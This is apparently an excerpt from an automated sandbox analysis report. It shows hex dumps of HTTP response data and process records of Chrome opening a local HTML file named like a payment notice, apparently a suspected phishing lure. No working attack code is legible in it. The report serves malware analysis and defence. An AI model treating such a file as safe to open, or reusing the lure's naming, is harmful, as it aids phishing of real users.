                                  2025-01-02 09:28:34 UTC1390INData Raw: 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00
                                  Data Ascii: *A T@@P*A T@@P*A T@@P*A
                                  2025-01-02 09:28:34 UTC1390INData Raw: 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00
                                  Data Ascii: A T@@P*A T@@P*A T@@P*A T
                                  2025-01-02 09:28:34 UTC1390INData Raw: 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40
                                  Data Ascii: T@@P*A T@@P*A T@@P*A T@@
                                  2025-01-02 09:28:34 UTC1390INData Raw: e1 ba 9a 92 63 e5 53 67 34 15 00 00 e0 d1 09 2a 00 00 f0 29 8a 83 b5 13 3f f9 a9 9a 92 6f c5 e3 43 a7 df 99 2b 0e d6 52 0f 01 00 00 32 40 50 01 00 80 4f da bc e9 2b f5 0a f6 42 4f 7f f5 e4 f5 59 4d 05 00 00 08 09 2a 00 00 f0 ff 78 37 a5 d3 74 15 4b 9a 0a 00 00 10 12 54 00 00 e0 ff a8 29 9d 49 53 01 00 00 42 82 0a 00 00 fc 5a 77 a9 4f 4d e9 58 9a 0a 00 00 f0 70 82 0a 00 00 14 0a 85 42 77 a9 ef 84 9a d2 d9 34 15 00 00 e0 21 04 15 00 00 28 14 0a 85 67 df 9c 2e 1e 1f 4a bd 82 c4 34 15 00 00 e0 f7 11 54 00 00 a0 50 bb 32 55 3e 75 26 f5 0a da 82 a6 02 00 00 7c 2a 41 05 00 80 4e 77 64 6c fc f0 f9 0b a9 57 d0 46 36 9b 4a 6f 75 20 f5 10 00 00 a0 8d 08 2a 00 00 74 b4 e2 60 6d e8 07 3f 4c bd 82 b6 d3 55 2c 3d fb a3 e9 ee 52 5f ea 21 00 00 40 bb 10 54 00 00 e8 5c dd
                                  Data Ascii: cSg4*)?oC+R2@PO+BOYM*x7tKT)ISBZwOMXpBw4!(g.J4TP2U>u&|*ANwdlWF6Jou *t`m?LU,=R_!@T\
                                  2025-01-02 09:28:34 UTC1390INData Raw: f5 00 00 00 68 8d 43 23 a3 a9 27 ec 91 bb df ff ee 3b cf d5 53 9d 7b f8 e0 3b 13 b7 5f 7a 21 c9 47 67 d1 d3 df b8 d4 5d ea 4b bd 02 00 00 68 01 41 05 00 80 3c e8 ad 0e 54 46 ce a5 5e b1 17 6e bf f4 c2 fb df ba 94 76 c3 bd ab 53 6f 9f fc fc 46 b3 91 76 46 26 74 15 4b 47 2f 26 fe f3 02 00 00 5a 42 50 01 00 20 0f 3a e1 78 ca 46 b3 71 fb a5 17 ee 5d 9d 4a 3d a4 50 28 14 9a f3 73 ff f6 5c 5d 53 79 14 0e a9 00 00 40 3e 08 2a 00 00 e4 c1 91 b1 f1 d4 13 76 dd 7b 5f 1d 6d 93 9a b2 a9 39 3f f7 de 57 f3 df b1 76 ce 21 15 00 00 c8 07 41 05 00 80 cc eb ad 0e 14 8f 0f a5 5e b1 bb 6e bf f4 42 1b be 6d be 72 73 d6 7b 2a 8f c2 21 15 00 00 c8 81 c7 9e 7f 3c f5 04 00 00 d8 99 a3 17 2f 95 87 eb a9 57 ec a2 f6 b9 e9 eb 77 35 e7 e7 ba fb 9e 7c f2 0b 5f 4c 3d a4 ad ed 3f 70 f0
                                  Data Ascii: hC#';S{;_z!Gg]KhA<TF^nvSoFvF&tKG/&ZBP :xFq]J=P(s\]Sy@>*v{_m9?Wv!A^nBmrs{*!</Ww5|_L=?p
                                  2025-01-02 09:28:34 UTC1390INData Raw: 00 6d 4c 50 01 00 20 33 ca a7 ce a4 9e d0 32 1d f5 80 ca 26 ef d2 87 7a fa ab bd f9 aa 86 00 00 90 27 82 0a 00 00 d9 90 b3 7f 68 ee a8 e3 29 9b d6 3a 2c 20 6d cf 21 87 54 00 00 a0 5d 09 2a 00 00 64 43 4f ff 40 ea 09 ad d4 81 c7 35 3a ed 44 ce f6 78 46 05 00 00 da 96 a0 02 00 40 36 e4 ec 1f 9a 3b f0 84 4a f3 4e c7 35 a4 6d a8 8c 9c 4b 3d 01 00 00 f8 74 82 0a 00 00 d9 d0 dd d7 97 7a 42 2b 35 3b ef 84 ca fa ea 6a ea 09 d9 90 b3 76 08 00 00 b9 21 a8 00 00 90 0d c5 c1 5a ea 09 2d b3 72 eb 46 ea 09 09 74 e0 a1 9c ed a9 9c f5 8c 0a 00 00 b4 23 41 05 00 80 6c 28 e5 28 a8 74 e0 f1 14 1e 9d 13 2a 00 00 d0 9e 04 15 00 00 b2 a1 ab 58 4a 3d a1 65 3a 36 a8 34 ef dc 4e 3d 21 03 8a c7 87 ba 4b b9 ba e0 0e 00 00 f2 41 50 01 00 20 03 72 f6 7f f6 1f 2c 2e a4 9e 90 c6 7a c3
                                  Data Ascii: mLP 32&z'h):, m!T]*dCO@5:DxF@6;JN5mK=tzB+5;jv!Z-rFt#Al((t*XJ=e:64N=!KAP r,.z
                                  2025-01-02 09:28:34 UTC1390INData Raw: b3 8e d0 00 00 40 18 85 0a 00 00 40 1a 8a 2b 2b d1 11 00 00 a0 b9 14 2a 00 00 00 00 00 00 a7 50 a8 00 00 00 55 b0 f2 0b 00 00 48 9a 42 05 00 00 20 0d 1d 2b bf 00 00 20 8e 42 05 00 00 aa e0 fa 85 83 ea 17 37 55 74 a2 23 00 00 40 73 29 54 00 00 a0 0a ed 4e d3 eb 04 95 12 00 00 90 34 85 0a 00 00 00 00 00 c0 29 14 2a 00 00 40 15 dc ff 28 c5 4c b7 17 1d 01 00 00 1a 4a a1 02 00 00 54 c1 fd 8f 52 4c 2f f6 a2 23 00 00 40 43 29 54 00 00 a8 af a3 bd dd e8 08 94 c3 09 19 00 00 20 75 0a 15 00 00 ea eb b0 bf 1b 1d 81 72 b8 48 0f 00 00 a4 4e a1 02 00 00 00 00 00 70 0a 85 0a 00 00 54 a1 3d db e8 9d 57 73 57 af 45 47 00 00 00 b8 10 85 0a 00 00 54 a1 58 b2 f3 8a 12 a8 a6 00 00 20 8a 42 05 00 00 98 b8 99 6e 2f 3a 02 00 00 c0 85 28 54 00 00 80 89 9b 56 a8 00 00 00 89 53 a8
                                  Data Ascii: @@++*PUHB + B7Ut#@s)TN4)*@(LJTRL/#@C)T urHNpT=WsWEGTX Bn/:(TVS
                                  2025-01-02 09:28:34 UTC1390INData Raw: a3 9d 67 d1 11 ca 31 b7 ba 16 1d 61 22 e6 3e b8 16 1d 01 00 00 60 22 14 2a 00 00 a4 e4 78 78 10 1d a1 34 59 6e c7 9a c9 f4 36 4c 1d 64 d3 26 02 00 40 a2 14 2a 00 00 a4 64 f0 78 33 3a 42 69 f2 bb 4b df ee cc 4e 2f 76 a3 53 64 2b a7 36 11 00 00 52 a4 50 01 00 20 25 39 dd a5 9f bb 7a 2d 3a 42 c9 8a 2b 0e a8 00 00 00 d9 52 a8 00 00 90 12 77 e9 eb 2c bf 8a a8 56 8e 32 fa f0 03 00 40 8a 14 2a 00 00 a4 64 b4 bd 15 1d a1 34 f9 cd 73 64 79 15 a6 3e 72 6a 13 01 00 20 45 0a 15 00 00 52 92 d3 19 89 4e 76 85 4a 7e 15 11 00 00 c0 af 28 54 00 00 48 cc e0 e9 a3 e8 08 e5 98 2a 3a ed 4e 56 5b bf 8a a5 e5 e8 08 39 1b ed e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 34 d2 e1 80 ca a4 1d 1f e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 54 42 38 a0 02 00 00 e4 4d a1
                                  Data Ascii: g1a">`"*xx4Yn6Ld&@*dx3:BiKN/vSd+6RP %9z-:B+Rw,V2@*d4sdy>rj ERNvJ~(TH*:NV[93)R.I43)R.ITB8M
                                  2025-01-02 09:28:34 UTC1390INData Raw: 9c 86 54 a6 17 bb 33 dd 5e 74 8a 97 14 57 56 a6 8a 4e 74 8a a6 18 3c de 8c 8e 00 00 00 bc 44 a1 02 00 40 3e 72 2a 54 5a f5 1b 52 a9 5b 9e bc b9 48 0f 00 00 75 a3 50 01 00 20 1f a3 ed ad e8 08 65 aa 5b 81 51 b7 3c 79 73 91 1e 00 00 ea 46 a1 02 00 40 3e 0e fb bb 47 7b fd e8 14 a5 a9 5b 81 e1 80 4a 95 32 6b 07 01 00 20 03 0a 15 00 00 b2 92 d3 d6 af 5a 9d 51 99 e9 f6 a6 17 bb d1 29 9a e2 64 34 74 94 1e 00 00 ea 46 a1 02 00 40 56 86 79 7d af bf 3e 43 2a f5 49 d2 04 99 7d 8c 01 00 20 0f 0a 15 00 00 b2 92 d3 84 4a ab d5 7a e7 fa 8d e8 08 2f 28 54 aa 64 df 17 00 00 d4 90 42 05 00 80 ac 8c b6 b7 4e 46 c3 e8 14 a5 79 fb 83 6b d1 11 5e 28 1c 50 a9 d0 f1 81 7d 5f 00 00 50 3b 0a 15 00 00 72 f3 f5 e3 cd e8 08 a5 99 2a 3a 75 68 32 da 9d d9 62 69 39 3a 45 83 64 36 68 05
                                  Data Ascii: T3^tWVNt<D@>r*TZR[HuP e[Q<ysF@>G{[J2k ZQ)d4tF@Vy}>C*I} Jz/(TdBNFyk^(P}_P;r*:uh2bi9:Ed6h


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:04:28:27
                                  Start date:02/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html"
                                  Imagebase:0x7ff715980000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:2
                                  Start time:04:28:30
                                  Start date:02/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8
                                  Imagebase:0x7ff715980000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  No disassembly